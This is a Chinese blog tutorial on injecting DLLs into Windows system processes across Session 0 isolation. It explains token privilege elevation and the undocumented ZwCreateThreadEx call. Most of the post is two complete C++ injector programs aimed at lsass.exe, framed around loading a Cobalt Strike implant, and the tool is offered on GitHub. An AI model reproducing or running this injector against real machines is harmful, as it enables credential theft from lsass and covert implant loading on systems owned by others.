刚更新完上一篇,于是我们就马不停蹄的去跟新下一篇!! Session0注入
:: 各位看官如果觉得还不错的可以给博主点个赞💕💕
这次,我把这个脚本直接传到Github上了 喜欢的师傅点个Star噢 (❤ ω ❤)
whoami-juruo/DLLInjectTools: 一款集成了窃取令牌和从Session0和3进行DLL注入的工具。 (github.com)https://github.com/whoami-juruo/DLLInjectTools?tab=readme-ov-file
目录
1.注不了系统进程
2.Session0隔离
3.Getsystem? ✔✔
4.Session0注入
CreateRemoteThread
1.注不了系统进程
我上一篇的Blog提供了一个DLL注入的脚本,当时我们注入的是Notepad++这个普通进程,不过这不是我们想要的啊!!! 哈哈哈哈,让我再引用一下我上一篇Blog
那我们尝试来注入一下Lsass进程 ? Lsass进程可是一个系统进程,我们电脑的明文密码就写在了这个进程里面(这个我之前讲过,如果好奇的可以看看我以前的Blog)
那么我们尝试注入一下?? 好家伙,直接连句柄都获取不了
那么我们以管理员的身份开启一下CMD来注入一下(过一下UAC看看)??
还是连句柄都获取不了,所以我们就要换代码!!
2.Session0隔离
首先我们来了解一下什么是Session0
在计算机领域中,"Session 0" 是指操作系统中运行的系统级别会话。具体来说,它通常指的是 Windows 操作系统中的服务会话。
更好的解释就是
在 Windows 中,用户登录后会创建一个交互式会话(Interactive Session),这是用户可以看到和操作的桌面环境。然而,有一些服务和系统进程不需要用户交互式桌面,它们在一个不可见的系统级别会话中运行,这个会话被称为 Session 0。
那么为什么我们就算是管理员也注入不了Lsass进程呢?
权限不足:即使你以管理员权限运行,仍然可能无法对 lsass.exe 进行 DLL 注入。这是因为管理员权限虽然可以进行许多操作,但某些系统关键进程可能需要更高级别的特权或专门的权限才能进行修改.
其中上面提到的更高级别的特权或者专门的权限就是System权限!!! 但是其实如果我们能过UAC或者是administrator的话,就已经是SYSTEM了!!!
3.Getsystem? ✔✔
我相信大家一定在提权的时候(无论是在CS,MSF)上都试过直接Getsystem!!!! 那么它的原理是什么呢 ? 其实就是窃取令牌(我在在内网的权限提升的时候讲过)
只有administrator或者过了UAC的普通管理员才能窃取SYSTEM令牌!!
不信我们来试试,我们分别上线一个没过UAC,和一个过了UAC的普通管理员
*代表过了UAC
然后我们先用普通管理员进行Getsysten!!
可以看见直接Failed了!!!
那么我们去过了UAC的管理员那里Getsystem试一下? 这时候我们就是SYSTEM权限
其实它就是通过下面这段代码来窃取令牌(提权)
BOOL EnableDebugPrivilege()
{
HANDLE hToken;
BOOL fOk = FALSE;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
fOk = (GetLastError() == ERROR_SUCCESS);
CloseHandle(hToken);
}
return fOk;
}
对于SYSTEM权限,我们是可以随便注入的!!! 不信我们在我们的脚本上面插入这个提权脚本
#include<iostream>
#include<tchar.h>
#include<Windows.h>
#include<Tlhelp32.h>
using namespace std;
#pragma comment(linker, "/section:.data,RWE")BOOL EnableDebugPrivilege()
{HANDLE hToken;BOOL fOk = FALSE;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)){TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);fOk = (GetLastError() == ERROR_SUCCESS);CloseHandle(hToken);}return fOk;
}DWORD GetProcessPID(LPCTSTR lpProcessName)
{DWORD Ret = 0;PROCESSENTRY32 p32;HANDLE lpSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (lpSnapshot == INVALID_HANDLE_VALUE){printf(" [-] 获取进程快照失败,请重试! Error:%d", ::GetLastError());return Ret;}p32.dwSize = sizeof(PROCESSENTRY32);::Process32First(lpSnapshot, &p32);do {if (!lstrcmp(p32.szExeFile, lpProcessName)){Ret = p32.th32ProcessID;break;}} while (::Process32Next(lpSnapshot, &p32));::CloseHandle(lpSnapshot);return Ret;
}void DLLInject(DWORD pid,LPCWSTR dllpath)
{//1.获取句柄HANDLE OriginalProcessHandle = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);if (OriginalProcessHandle == NULL){cout << " [-] Get TargetProcessHandle Failed :(" << endl;if (EnableDebugPrivilege() == TRUE){cout << " [-] Is This EXE Opened? :(" << endl;}else {cout << " [-] Please Run This Under Administrator Role :(" << endl;}return;}else {cout << " [*] Get OriginalProcessHandle Successfully :)" << endl;}//2.远程申请内存DWORD length = (wcslen(dllpath) + 1) * sizeof(TCHAR);PVOID RemoteMemory = VirtualAllocEx(OriginalProcessHandle, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (RemoteMemory == NULL){cout << " [-] VirtualAlloc Address Failed :(" << endl;return;}else {cout << " [*] VirtualAlloc Address Successfully :)" << endl;} //3.将CS上线的DLL写入内存BOOL WriteStatus = WriteProcessMemory(OriginalProcessHandle,RemoteMemory,dllpath,length,NULL);if (WriteStatus == 0){cout << " [-] Write CS's DLL Into Memory Failed :(" << endl;return;}else{cout << " [*] Write CS's DLL Into Memory Successfully :)" << endl;}//4.获取LoadLibrary地址FARPROC FunctionHandle = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryW");//5.创建线程HANDLE RemoteHandle = CreateRemoteThread(OriginalProcessHandle, NULL, 0, (LPTHREAD_START_ROUTINE)FunctionHandle, RemoteMemory,0,NULL);if (RemoteHandle == NULL){cout << " [-] Create Remote Thread Failed :(" << endl;return;}else {cout << " [*] Create Remote Thread Successfully :)" << endl;}//6.等待线程结束WaitForSingleObject(RemoteHandle, -1);//7.释放DLL空间VirtualFreeEx(OriginalProcessHandle, RemoteMemory, length, MEM_COMMIT);//8.关闭句柄CloseHandle(OriginalProcessHandle);cout << " [*] DLL inj&ct successfu11y !! Enj0y Hacking Time :) !" << endl;
}int main()
{HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);SetConsoleTextAttribute(hConsole, FOREGROUND_GREEN); cout << endl<<" Under the sun,there is no secure system!!"<<endl<<" Scripted By Whoami@127.0.0.1 :》" << endl;if (EnableDebugPrivilege() == TRUE){cout << "-----------------------------!!START!!--------------------------------" << endl;cout << " [*] Privilege Elevated Successfully, Now You Have Bypassed UAC :) " << endl;}else {cout << "-----------------------------!!START!!--------------------------------" << endl;cout << " [-] Privilege Elevated Failed, You Haven't Bypassed UAC :( " << endl;}DWORD PID = GetProcessPID(L"lsass.exe"); //必须小写DLLInject(PID, L"C:\\Users\\ASUS\\Desktop\\inject.dll");return 0;
}
然后我们直接以管理员权限运行!(当然,你的DLL得写绝对路径)
4.Session0注入
上面的方法确实可以注入高权限的进程,但是不是我们今天的主题捏!! 我们今天的主题是Session0的注入,虽然说Session0注入也是要提升到System权限,但是这两个注入是有本质区别的!!! 所以我们还是开始我们今天的Session0注入吧!!!
CreateRemoteThread
我们众所周知,我们的CreateRemoteThread这个函数他是这样进入0环的
- 在64位下,首先将他扩展成CreateRemoteThreadStub(八个参数)
- 然后去到KernelBase.dll中寻找CreateRemoteThreadEx这个API
- 再通过一众的跳步之后,我们就在NTdll中找到NTCreateThreadEx这个最终的API
- 然后直接通过SysCall进入内核层再去SSDT表
所以我们就可以直接用一个更加底层的函数!!! ZwCreateThreadEx
研究发现,CreateRemoteThread底层会调用内核函数ZwCreateThreadEx,而系统调用此函数时,如果发现时系统进程,会把函数的第七个参数CreateSuspended设置为1,导致线程创建完成后会一直处于挂起状态,无法恢复运行,导致注入失败。所以我们可以手动调用ZwCreateThread这一内核函数!
其中,ZwCreateThreadEx是一个未文档化的API,所以我们需要手动声明
#ifdef _WIN64
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnkown);
#else
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
DWORD dwStackSize,
DWORD dw1,
DWORD dw2,
LPVOID pUnkown);
所以其实我们的流程都是差不多的,只不过要转换函数罢了,这我们就对昨天的代码直接进行更改了(我想偷懒)
#include<iostream>
#include<tchar.h>
#include <cstring>
#include<Windows.h>
#include<Tlhelp32.h>
#include <cctype>
using namespace std;
#pragma comment(linker, "/section:.data,RWE")BOOL EnableDebugPrivilege()
{HANDLE hToken;BOOL fOk = FALSE;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)){TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);fOk = (GetLastError() == ERROR_SUCCESS);CloseHandle(hToken);}return fOk;
}DWORD GetProcessPID(LPCTSTR lpProcessName)
{DWORD Ret = 0;PROCESSENTRY32 p32;HANDLE lpSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (lpSnapshot == INVALID_HANDLE_VALUE){printf(" [-] 获取进程快照失败,请重试! Error:%d", ::GetLastError());return Ret;}p32.dwSize = sizeof(PROCESSENTRY32);::Process32First(lpSnapshot, &p32);do {if (!lstrcmp(p32.szExeFile, lpProcessName)){Ret = p32.th32ProcessID;break;}} while (::Process32Next(lpSnapshot, &p32));::CloseHandle(lpSnapshot);return Ret;
}void DLLInject(DWORD pid, LPCWSTR dllpath)
{//1.获取句柄HANDLE OriginalProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);if (OriginalProcessHandle == NULL){cout << " [-] Get TargetProcessHandle Failed :(" << endl;if (EnableDebugPrivilege() == TRUE){cout << " [-] Is This EXE Opened? :(" << endl;}else {cout << " [-] Please Run This Under Administrator Role :(" << endl;}return;}else {cout << " [*] Get OriginalProcessHandle Successfully :)" << endl;}//2.远程申请内存DWORD length = (wcslen(dllpath) + 1) * sizeof(TCHAR);PVOID RemoteMemory = VirtualAllocEx(OriginalProcessHandle, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (RemoteMemory == NULL){cout << " [-] VirtualAlloc Address Failed :(" << endl;return;}else {cout << " [*] VirtualAlloc Address Successfully :)" << endl;}//3.将CS上线的DLL写入内存BOOL WriteStatus = WriteProcessMemory(OriginalProcessHandle, RemoteMemory, dllpath, length, NULL);if (WriteStatus == 0){cout << " [-] Write CS's DLL Into Memory Failed :(" << endl;return;}else{cout << " [*] Write CS's DLL Into Memory Successfully :)" << endl;}//4.获取LoadLibrary地址FARPROC LoadLibraryHandle = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryW");//5.声明ZwCreateThreadEx函数
#ifdef _WIN64typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle,ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,ULONG CreateThreadFlags,SIZE_T ZeroBits,SIZE_T StackSize,SIZE_T MaximumStackSize,LPVOID pUnkown);
#elsetypedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle,ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,BOOL CreateSuspended,DWORD dwStackSize,DWORD dw1,DWORD dw2,LPVOID pUnkown);
#endif//6.获取NTDLL中ZwCreateThreadEx函数typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwCreateThreadEx");if (ZwCreateThreadEx == NULL){cout << " [-] Get ZwCreateThreadEx Address Failed :(" << endl;return;}else {cout << " [*] Get ZwCreateThreadEx Address Successfully :)" << endl;}//5.创建线程 ring3调用CreateRemoteThreadHANDLE RemoteHandle = CreateRemoteThread(OriginalProcessHandle, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryHandle, RemoteMemory, 0, NULL);if (RemoteHandle == NULL){cout << " [-] Ring3 Thread Inject Failed :(" << endl;return;}else {cout << " [*] Ring3 Thread Inject Successfully :)" << endl;}//7.创建线程 ring0调用ZwCreateThreadExHANDLE hRemoteThread;DWORD Status = 0;Status = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, OriginalProcessHandle, (LPTHREAD_START_ROUTINE)LoadLibraryHandle, RemoteMemory, 0, 0, 0, 0, NULL);if (Status == NULL){cout << " [*] Ring0 Thread Inject Successfully :)" << endl;}else{cout << " [-] Ring0 Thread Inject Failed :(" << endl;return;}WaitForSingleObject(RemoteHandle, -1);//8.释放DLL空间VirtualFreeEx(OriginalProcessHandle, RemoteMemory, length, MEM_COMMIT);//9.关闭句柄CloseHandle(OriginalProcessHandle);CloseHandle(ZwCreateThreadEx);cout << " [*] DLL inj&ct successfu11y !! Enj0y Hacking Time :) !" << endl;
}int _tmain(int argc, TCHAR* argv[])
{HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);SetConsoleTextAttribute(hConsole, FOREGROUND_RED | FOREGROUND_BLUE);if (argc == 3) {std::cout << "▓█████▄ ██▓ ██▓ ██▓ ███▄ █ ▄▄▄██▓▓▓▓█████ ▄████▄ ▄▄▄█████▓\n";std::cout << "▓██▓ ██▌▓██▓ ▓██▓ ▓██▓ ██ ▓█ █ ▓██ ▓█ ▓ ▓██▓ ▓█ ▓ ██▓ ▓▓\n";std::cout << "▓██ █▌▓██▓ ▓██▓ ▓██▓▓██ ▓█ ██▓ ▓██ ▓███ ▓▓█ ▄ ▓ ▓██▓ ▓▓\n";std::cout << "▓▓█▄ ▌▓██▓ ▓██▓ ▓██▓▓██▓ ▓▌██▓▓██▄██▓ ▓▓█ ▄ ▓▓▓▄ ▄██▓▓ ▓██▓ ▓ \n";std::cout << "▓▓████▓ ▓██████▓▓██████▓▓██▓▓██▓ ▓██▓ ▓███▓ ▓▓████▓▓ ▓███▓ ▓ ▓██▓ ▓ \n";std::cout << " ▓▓ ▓ ▓ ▓▓▓ ▓▓ ▓▓▓ ▓▓▓ ▓ ▓▓ ▓ ▓ ▓▓▓▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓ ▓ ▓ ▓▓ \n";std::cout << " ▓▓ ▓ ▓ ▓ ▓ ▓▓ ▓ ▓ ▓ ▓ ▓▓ ▓▓ ▓ ▓▓ ▓ ▓▓▓ ▓ ▓ ▓ ▓ ▓ ▓ \n";std::cout << " ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ \n";std::cout << " ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓▓ ▓ \n";std::cout << " ▓ ▓ \n";SetConsoleTextAttribute(hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);cout << endl << " Under the sun,there is no secure system!!" << endl << " Scripted By Whoami@127.0.0.1 :》"<<endl<<" Color Picked By Icy Water :)" << endl;if (EnableDebugPrivilege() == TRUE){//cout << "-----------------------------!!START!!--------------------------------" << endl;cout << " [*] Privilege Elevated Successfully, Now You Have Bypassed UAC :) " << endl;}else {cout << "-----------------------------!!START!!--------------------------------" << endl;cout << " [-] Privilege Elevated Failed, You Haven't Bypassed UAC :( " << endl;}DWORD PID = GetProcessPID(argv[1]); //必须小写DLLInject(PID, argv[2]);}else{cout << " [-] Two Parameters are required" << endl;}return 0;
}
这里小编也把扔到Github上了,如果喜欢的兄弟萌也可以下来玩一玩噢!!